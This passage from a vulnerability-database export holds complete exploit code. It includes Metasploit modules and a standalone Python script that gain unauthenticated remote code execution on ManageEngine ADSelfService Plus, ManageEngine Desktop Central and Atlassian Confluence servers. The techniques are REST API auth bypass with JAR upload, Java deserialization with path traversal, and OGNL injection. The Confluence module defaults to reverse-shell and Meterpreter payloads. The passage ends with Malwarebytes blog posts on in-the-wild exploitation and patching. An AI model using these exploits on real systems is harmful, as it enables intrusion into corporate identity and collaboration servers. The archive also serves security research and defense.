'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n 
form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/37080", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-22T13:22:19", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. 
Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 
10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine 
Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => 
serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-04T15:51:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "zdt", "title": "Confluence Server 7.12.4 - (OGNL injection) Remote Code Execution Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": 
false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "1337DAY-ID-36694", "href": "https://0day.today/exploit/description/36694", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\n# Exploit Author: h3v0x\n# Vendor Homepage: https://www.atlassian.com/\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\n# Version: All < 7.12.x versions before 7.12.5\n# Tested on: Linux Distros \n# CVE : CVE-2021-26084\n\n#!/usr/bin/python3\n\n# References: \n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport optparse\n\nparser = optparse.OptionParser()\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\n\noptions, args = parser.parse_args()\nsession = requests.Session()\n\nurl_vuln = options.url\nendpoint = options.path\n\nif not options.url or not options.path:\n\n print('[+] Specify an url target')\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\n print('[+] Example help usage: exploit.py -h')\n exit()\n\n\ndef banner():\n\n print('---------------------------------------------------------------')\n print('[-] Confluence Server Webwork OGNL injection')\n print('[-] CVE-2021-26084')\n print('[-] https://github.com/h3v0x')\n print('--------------------------------------------------------------- \\n')\n\n\ndef cmdExec():\n\n while True:\n cmd = input('> ')\n xpl_url = url_vuln + endpoint\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) 
Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\n\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\n print(queryStringValue)\n\n\nbanner()\ncmdExec()\n", "sourceHref": "https://0day.today/exploit/36694", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-15T11:22:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, 
"published": "2021-09-10T00:00:00", "type": "zdt", "title": "Atlassian Confluence WebWork OGNL Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-10T00:00:00", "id": "1337DAY-ID-36730", "href": "https://0day.today/exploit/description/36730", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Atlassian Confluence WebWork OGNL Injection',\n 'Description' => %q{\n This module exploits an OGNL injection in Atlassian Confluence's\n WebWork component to execute commands as the Tomcat user.\n },\n 'Author' => [\n 'Benny Jacob', # Discovery\n 'Jang', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-26084'],\n ['URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html'],\n ['URL', 'https://jira.atlassian.com/browse/CONFSERVER-67940'],\n ['URL', 'https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis'],\n ['URL', 'https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md'],\n ['URL', 
'https://testbnull.medium.com/atlassian-confluence-pre-auth-rce-cve-2021-26084-v%C3%A0-c%C3%A2u-chuy%E1%BB%87n-v%E1%BB%81-%C4%91i%E1%BB%83m-m%C3%B9-khi-t%C3%ACm-bug-43ab36b6c455'],\n ['URL', 'https://tradahacking.vn/atlassian-confluence-cve-2021-26084-the-other-side-of-bug-bounty-45ed19c814f6']\n ],\n 'DisclosureDate' => '2021-08-25', # Vendor advisory\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'], # TODO: Windows?\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false, # Tomcat user\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_bash'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8090\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [\n # /var/atlassian/application-data/confluence/analytics-logs/*.atlassian-analytics.log\n # /var/atlassian/application-data/confluence/logs/atlassian-confluence.log\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK # CmdStager\n ]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n token1 = rand_text_alphanumeric(8..16)\n token2 = rand_text_alphanumeric(8..16)\n token3 = rand_text_alphanumeric(8..16)\n\n res = inject_ognl(\"#{token1}'+'#{token2}'+'#{token3}\")\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body.include?(\"#{token1}#{token2}#{token3}\")\n return CheckCode::Safe('Failed to test OGNL injection.')\n end\n\n CheckCode::Vulnerable('Successfully tested OGNL injection.')\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :unix_cmd\n 
execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts = {})\n res = inject_ognl(ognl_payload(cmd))\n\n unless res&.code == 200 && res.body.match?(/queryString.*Process.*pid.*exitValue/)\n fail_with(Failure::PayloadFailed, \"Failed to execute command: #{cmd}\")\n end\n\n vprint_good(\"Successfully executed command: #{cmd}\")\n end\n\n def inject_ognl(ognl)\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/pages/createpage-entervariables.action'),\n 'vars_post' => {\n # https://commons.apache.org/proper/commons-ognl/apidocs/org/apache/commons/ognl/JavaCharStream.html\n # https://github.com/jkuhnert/ognl/blob/f4e18cda6a89bcdad15c617c0d94013a854a1e93/src/main/java/ognl/JavaCharStream.java#L324-L341\n 'queryString' => Rex::Text.to_hex(ognl, '\\\\u00')\n }\n )\n end\n\n def ognl_payload(cmd)\n # https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#expression-language-el---code-execution\n # https://www.tutorialspoint.com/java/lang/class_forname_loader.htm\n # https://docs.oracle.com/javase/7/docs/api/java/lang/ProcessBuilder.html\n # https://docs.oracle.com/javase/8/docs/api/java/util/Base64.Decoder.html\n <<~OGNL.gsub(/^\\s+/, '').tr(\"\\n\", '')\n '+Class.forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval('\n new java.lang.ProcessBuilder(\n \"/bin/bash\",\n \"-c\",\n new java.lang.String(\n java.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\")\n )\n ).start()\n ')+'\n OGNL\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/36730", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-09-17T14:35:09", "description": "In a [joint advisory](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>) the FBI, the United States Coast Guard Cyber Command (CGCYBER), and the Cybersecurity and Infrastructure Security Agency 
(CISA) warn that advanced persistent threat (APT) cyber-actors may be exploiting a vulnerability in ManageEngine's single sign-on (SSO) solution.\n\n### The vulnerability\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). The vulnerability in question is listed under [CVE-2021-40539](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40539>) as a REST API authentication bypass with resultant remote code execution (RCE) in Zoho ManageEngine ADSelfService Plus version 6113 and prior.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it's a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network.\n\n### In-the-wild exploitation\n\nWhen [word of the vulnerability came out](<https://threatpost.com/zoho-password-manager-zero-day-attack/169303/>) it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other [researchers](<https://twitter.com/voodoodahl1/status/1435673340539281410>) chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat-actor. Yesterday's joint advisory seems to support that, telling us that APT cyber-actors are likely among those exploiting the vulnerability. \n\nThey find this of high concern since this poses a serious risk to critical infrastructure companies. 
CISA recognizes [16 critical infrastructure sectors](<https://www.cisa.gov/critical-infrastructure-sectors>) whose "assets, systems, and networks, whether physical or virtual, are considered so vital to the United States that their incapacitation or destruction would have a debilitating effect on security, national economic security, national public health or safety, or any combination thereof."\n\nThe joint advisory points out that the suspected APT cyber-actors have targeted academic institutions, defense contractors, and critical infrastructure entities in multiple industry sectors\u2014including transportation, IT, manufacturing, communications, logistics, and finance.\n\nIt also warns that successful exploitation of the vulnerability allows an attacker to place web shells, which enable the adversary to conduct post-exploitation activities, such as compromising administrator credentials, conducting lateral movement, and exfiltrating registry hives and Active Directory files.\n\nAccording to the advisory, the JavaServer Pages web shell arrives as a `.zip` file "masquerading as an x509 certificate" called `service.cer`. The web shell is then accessed via the URL path `/help/admin-guide/Reports/ReportGenerate.jsp`. \n\nHowever, it warns:\n\n> Confirming a successful compromise of ManageEngine ADSelfService Plus may be difficult\u2014the attackers run clean-up scripts designed to remove traces of the initial point of compromise and hide any relationship between exploitation of the vulnerability and the web shell.\n\nPlease consult the advisory for a [full list of IOCs](<https://us-cert.cisa.gov/ncas/alerts/aa21-259a>).\n\n### Mitigation\n\nA patch for this vulnerability was made available on September 7, 2021. Users are advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urge organizations to make sure that ADSelfService Plus is not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations. It also has information about how you can reach out to support if you need further information, have any questions, or face any difficulties updating ADSelfService Plus.\n\nStay safe, everyone!\n\nThe post [FBI and CISA warn of APT groups exploiting ADSelfService Plus](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-17T13:48:46", "type": "malwarebytes", "title": "FBI and CISA warn of APT groups exploiting ADSelfService Plus", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-40539"], "modified": "2021-09-17T13:48:46", "id": "MALWAREBYTES:B6DA5FE033D50131FABF027A2BB04385", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-29T18:23:40", "description": "A joint Cybersecurity Advisory, coauthored by cybersecurity authorities of the United States (CISA, NSA, and FBI), Australia (ACSC), Canada (CCCS), New Zealand (NZ NCSC), and the United Kingdom (NCSC-UK) has detailed the top 15 Common Vulnerabilities and Exposures (CVEs) routinely exploited by malicious cyber actors in 2021, as well as other CVEs frequently exploited.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. 
Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). These are the CVEs that made it into the top 10.\n\n## 1\\. Log4Shell\n\n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>), commonly referred to as [Log4Shell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend/>) or Logjam. This was a software flaw in the Apache Log4j logging utility. A logger is a piece of software that logs every event that happens in a computer system. The records it produces are useful for IT and security folks to trace errors or check any abnormal behavior within a system.\n\nWhen Log4Shell emerged in December 2021, what caught many by surprise was the enormous number of applications and web services, including those offered by Twitter, Apple, Google, Amazon, Steam, and Microsoft, among others, that were relying on Log4j, many of which inherited the vulnerability.\n\nThis made for an exceptionally broad attack surface. Combine that with an incredibly easy to use exploit and there should be no surprise that this vulnerability made it to the top of the list.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has launched an open source scanner to find applications that are vulnerable to the Log4j vulnerabilities listed as CVE-2021-44228 and CVE-2021-45046. The [CISA Log4j scanner](<https://github.com/cisagov/log4j-scanner>) is based on other open source tools and supports scanning lists of URLs, several fuzzing options, DNS callback, and payloads to circumvent web-application firewalls.\n\n## 2\\. 
CVE-2021-40539\n\n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>) is a REST API authentication bypass [vulnerability in ManageEngine\u2019s single sign-on (SSO) solution](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/fbi-and-cisa-warn-of-apt-groups-exploiting-adselfservice-plus/>) with resultant remote code execution (RCE) that exists in Zoho ManageEngine ADSelfService Plus version 6113 and prior. When word of this vulnerability came out it was already clear that it was being exploited in the wild. Zoho remarked that it was noticing indications of this vulnerability being exploited. Other researchers chimed in saying the attacks had thus far been highly targeted and limited, and possibly the work of a single threat actor. It was clear from the start that [APT](<https://blog.malwarebytes.com/glossary/advanced-persistent-threat-apt/>) threat-actors were likely among those exploiting the vulnerability.\n\nThe vulnerability allows an attacker to gain unauthorized access to the product through REST API endpoints by sending a specially crafted request. This allows attackers to carry out subsequent attacks resulting in RCE.\n\nFor those that have never heard of this software, it\u2019s a self-service password management and single sign-on (SSO) solution for Active Directory (AD) and cloud apps. Which means that any attacker that is able to exploit this vulnerability immediately has access to some of the most critical parts of a corporate network. A patch for this vulnerability was made available on September 7, 2021. Users were advised to update to ADSelfService Plus build 6114. 
The FBI, CISA, and CGCYBER also strongly urged organizations to make sure that ADSelfService Plus was not directly accessible from the Internet.\n\nThe [ManageEngine site](<https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html>) has specific instructions on how to identify and update vulnerable installations.\n\n## 3\\. ProxyShell\n\nThird on the list are three vulnerabilities that are commonly grouped together and referred to as [ProxyShell](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/08/patch-now-microsoft-exchange-attacks-target-proxyshell-vulnerabilities/>): [CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>), [CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>), and [CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>).\n\nThe danger lies in the fact that these three vulnerabilities can be chained together to allow a remote attacker to run code on an unpatched Microsoft Exchange server. Attackers use them as 